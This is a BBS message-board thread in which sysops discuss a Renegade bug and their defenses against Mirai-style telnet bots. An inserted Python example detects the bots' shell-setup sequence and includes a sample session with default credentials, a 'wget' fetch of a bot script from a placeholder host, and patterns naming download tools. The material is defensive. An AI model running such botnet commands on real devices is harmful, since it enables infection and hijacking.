• Bug in Renegade's Renemail

    From Nick Andre@1:229/426 to All on Sunday, June 24, 2018 10:51:05
    There is a serious bug in Renegade's "Renemail" utility that I just fixed, with regards to point-systems.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Sean Dennis@1:18/200 to Nick Andre on Monday, June 25, 2018 14:50:04
    Hello Nick,

    24 Jun 18 10:51 at you wrote to All:

    There is a serious bug in Renegade's "Renemail" utility that I just
    fixed, with regards to point-systems.

    You know, I just discovered I had the Renegade source (don't ask me which version) hiding out somewhere and compiled for S&G. It worked. Another project to put aside...

    Later,
    Sean

    ... I have a love interest in every one of my films - a gun. - Schwarzenegger
    --- GoldED+/LNX 1.1.5-b20170303
    * Origin: Outpost BBS * Limestone, TN, USA (1:18/200)
  • From Nick Andre@1:229/426 to Sean Dennis on Tuesday, June 26, 2018 02:49:36
    On 25 Jun 18 14:50:04, Sean Dennis said the following to Nick Andre:

    There is a serious bug in Renegade's "Renemail" utility that I just fixed, with regards to point-systems.

    You know, I just discovered I had the Renegade source (don't ask me which version) hiding out somewhere and compiled for S&G. It worked. Another project to put aside...

    I'm using the Y2KA2 source, with a ton of my own modifications.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Sean Dennis@1:18/200 to Nick Andre on Tuesday, June 26, 2018 13:13:15
    Hello Nick,

    26 Jun 18 02:49 at you wrote to me:

    I'm using the Y2KA2 source, with a ton of my own modifications.

    I think that's the source code I have. I don't remember where I put it now but I'll have to dig it up and see. I admit, would be fun to hack at Renegade a bit just for S&G.

    Later,
    Sean

    ... If a million people say a foolish thing, it is still a foolish thing.
    --- GoldED+/LNX 1.1.5-b20170303
    * Origin: Outpost BBS * Limestone, TN, USA (1:18/200)
  • From Nick Andre@1:229/426 to Sean Dennis on Tuesday, June 26, 2018 15:09:12
    On 26 Jun 18 13:13:15, Sean Dennis said the following to Nick Andre:

    I'm using the Y2KA2 source, with a ton of my own modifications.

    I think that's the source code I have. I don't remember where I put it now but I'll have to dig it up and see. I admit, would be fun to hack at Renegade a bit just for S&G.

    Off the top of my head, the two fundamental modifications I made were to remove the message-database limitations and remove some new-user questions I didn't feel like asking callers... but the most interesting change was a few lines of code to add a hook to catch script kiddies. I had no choice; my network was getting totally slammed with rogue Telnet traffic but I did not want to inconvenience BBS callers by having to call on a different port.

    If a non-ANSI user calls here, I know that 99% of the time it's a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a separate process that resets the kill file once a week in the case of a false-positive.

    That has significantly reduced the amount of rogue Telnet traffic here and because the BBS does not load on blacklisted connections, the daily stats and logs are much more accurate.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)
  • From Gene Buckle@1:138/142 to Nick Andre on Tuesday, June 26, 2018 14:30:35
    Re: Re: Bug in Renegade's Renemail
    By: Nick Andre to Sean Dennis on Tue Jun 26 2018 03:09 pm

    If a non-ANSI user calls here, I know that 99% of the time it's a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a separate process that resets the kill file once a week in the case of a false-positive.

    Nice solution! I just tweaked Synchronet's logon.js (login?) to terminate the connection if the user name was any number of ones that the skids typically use (root, admin, etc.).

    g.
    --- SBBSecho 2.27-Win32
    * Origin: The Retro Archive (1:138/142)
  • From mark lewis@1:3634/12.73 to Nick Andre on Thursday, June 28, 2018 08:31:34

    On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:

    If a non-ANSI user calls here, I know that 99% of the time it's a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a separate process that resets the kill file once a week in the case of a false-positive.

    that's similar to what i do here except i use an IDS on my firewall... ISP issued modems are shit... just barely enough to call them a modem/firewall/router... we use ours in bridge mode and have our own dedicated firewall/router machine protecting the three networks here... this firewall being one of smoothwall, ipfire, pfSense and similar... we chose ours because we can customize it if we choose... the IDS comes with but the automated dropping of unwanted connections is our custom addition...

    since i have frontdoor running and answering the connection requests on telnet, it answers and logs the "DFRS" (data from ring signal)... that should be the caller-id stuff but on telnet, with these automated mirai variants, they just spew their credentials and then try to set up their shell... it is because of frontdoor that i was able to see what was going on... most bbses hide that data... so anyway, once i knew what was going on, i wrote a few IDS rules to detect these connections... i followed a few rules, though...

    1. we don't care what name and password they spew.
    2. we DO care if they try to set up their shell.
    3. shell setup is generally always the same
    enable.system.shell.sh
    (dots used for spaces so as to not trip IDS)
    4. after the above they generally try to load busybox with some fake module or program call. this call is simply a delimiter so they can see when their attempt is finished.
    5. sometimes, instead of loading busybox, they try to download scripts from somewhere else via tools like fgrep, curl, wget, ftpget, tftp, and even echo.

    so with the above, we have five IDS rules... one to detect each stage of the command shell setup attempt... that's really all it takes but we do track the fake module or program names they try to initiate... that's how the thing got its name and how the skiddies keep them separated...

    in 2016, there were 12 unique variants.
    in 2017, there were 30 new unique variants.
    in 2018, there have been at least 73 new unique variants.

    the most notable thing is that by running the IDS, we're able to detect these attempts and stop them in the firewall before they even get a chance to get into the network... sure, the initial part is being fed to the mailer but as soon as the IDS qualifies the traffic as a mirai variant, it drops the connection via iptables rules... right now we have rules for each of the unique modules which we used as our trigger to block the connection but it is just about to the point where we don't even care about them any more... we could drop the connection just based on the attempt to set up the shell which would reduce our rules set to only 4 rules instead of the current 115 we have in place...

    there used to be a lot more attempts as the skiddies attempted to build their botnets... those attempts have dropped a lot since the beginning... there's only maybe 5 unique variants that are active... at least going by what is seen over here... sometimes an older one will come around and we still see some mirai attempts... one of the funniest ones is using "anarchy" as their fake module but the actual funny part is they're trying to load "SH" for their shell instead of "sh"... we all know how *nix systems are case sensitive so we know this won't work but it could be a second round attempt where the first round may have gotten in and created a "SH" shell... i dunno but i'm glad to be having my firewall performing this analysis and blocking rather than submitting my server to the abuse... that one IDS installation on the firewall is protecting a number of bbses and they're very happy they don't have to do the work of analyzing and blocking these skiddie attempts...

    at one point in time, our firewall was blocking over 4000 unique IPs that were known to be infected with a mirai variant... the attempts have fallen off a whole lot and today we're tracking less than 1000 unique IPs hitting here... i want to suspect the skids are actually reading their logs and seeing what BBS and mailer logons look like... i want to suspect they are adjusting their code to detect those and drop the connection on their own since they can't get in and do anything... i dunno... maybe it is all just a dream...

    )\/(ark

    Always Mount a Scratch Monkey
    Do you manage your own servers? If you are not running an IDS/IPS yer doin' it wrong...
    ... be kind to your four footed friends...
    ---
    * Origin: (1:3634/12.73)
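    The five-stage detection Mark describes, as an added example in Python that is not part of the post or of his actual IDS rules: it walks a telnet session transcript line by line, ignores the spewed credentials, flags the ordered shell-setup sequence (case-insensitively, so the "SH" variant is still caught), records the bogus busybox applet as the variant name and any download tools, and decides to block on the shell-setup attempt alone, as the post suggests is enough. The transcript and the COMMON_APPLETS allow-list are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Stage 3 of the post: the shell-setup commands, one per line ("enable.system.shell.sh").
# Matched case-insensitively so the "SH" variant the post mentions is still flagged.
SHELL_SETUP = ("enable", "system", "shell", "sh")
# Stage 4: a busybox call whose bogus applet name is the bot's marker; used as the variant tag.
BUSYBOX_CALL = re.compile(r"(?:/bin/)?busybox\s+([A-Za-z0-9_.-]+)", re.IGNORECASE)
# Stage 5: the download tools the post lists, used instead of a busybox marker.
DOWNLOADER = re.compile(r"\b(fgrep|curl|wget|ftpget|tftp|echo)\b", re.IGNORECASE)
# Real busybox applets a caller might legitimately type (assumed list); never treated as a marker.
COMMON_APPLETS = {"sh", "ls", "cat", "ps", "wget", "tftp", "echo"}

@dataclass
class Verdict:
    shell_setup: bool = False                              # stage 3 seen, in order
    variant: Optional[str] = None                          # stage 4 marker, if any
    downloaders: List[str] = field(default_factory=list)  # stage 5 tools seen
    block: bool = False                                    # drop the connection?

def analyse_session(lines: List[str]) -> Verdict:
    """Walk a telnet transcript and report which Mirai stages appeared.
    Stages 1-2 (the spewed credentials) are ignored, per the post's rule 1."""
    v = Verdict()
    step = 0
    for raw in lines:
        line = raw.strip()
        if step < len(SHELL_SETUP) and line.lower() == SHELL_SETUP[step]:
            step += 1
            v.shell_setup = step == len(SHELL_SETUP)
            continue
        m = BUSYBOX_CALL.search(line)
        if m and v.variant is None and m.group(1).lower() not in COMMON_APPLETS:
            v.variant = m.group(1)
        v.downloaders.extend(t.lower() for t in DOWNLOADER.findall(line))
    # As the post notes, the shell-setup attempt alone justifies dropping the
    # connection (via iptables); the marker is only kept so variants can be counted by name.
    v.block = v.shell_setup
    return v

# Constructed transcript, not captured traffic: credentials, shell setup, marker, download.
SAMPLE_SESSION = [
    "login: admin", "password: 1234",
    "enable", "system", "shell", "sh",
    "/bin/busybox anarchy",
    "wget http://placeholder.invalid/bot.sh",
]
```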
  • From Nick Andre@1:229/426 to Mark Lewis on Thursday, June 28, 2018 18:54:13
    On 28 Jun 18 08:31:34, Mark Lewis said the following to Nick Andre:

    If a non-ANSI user calls here, I know that 99% of the time it's a script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If you answer wrong, your IP address is blacklisted in the NET2BBS "kill" file. A blacklisted system is trapped and disconnected before the BBS loads. I write a separate process that resets the kill file once a week in the case of a false-positive.

    that's similar to what i do here except i use an IDS on my firewall... ISP

    [...]

    An interesting read. Yes, ISP modems are garbage. Totally agreed.

    Ever since I wrote the "hooks" into Renegade to do what I wanted it to do, the statistics are more accurate, the computer is not needlessly loading the BBS on a call, etc... it's just much more efficient here.

    Nick

    --- Renegade vY2Ka2
    * Origin: Joey, do you like movies about gladiators? (1:229/426)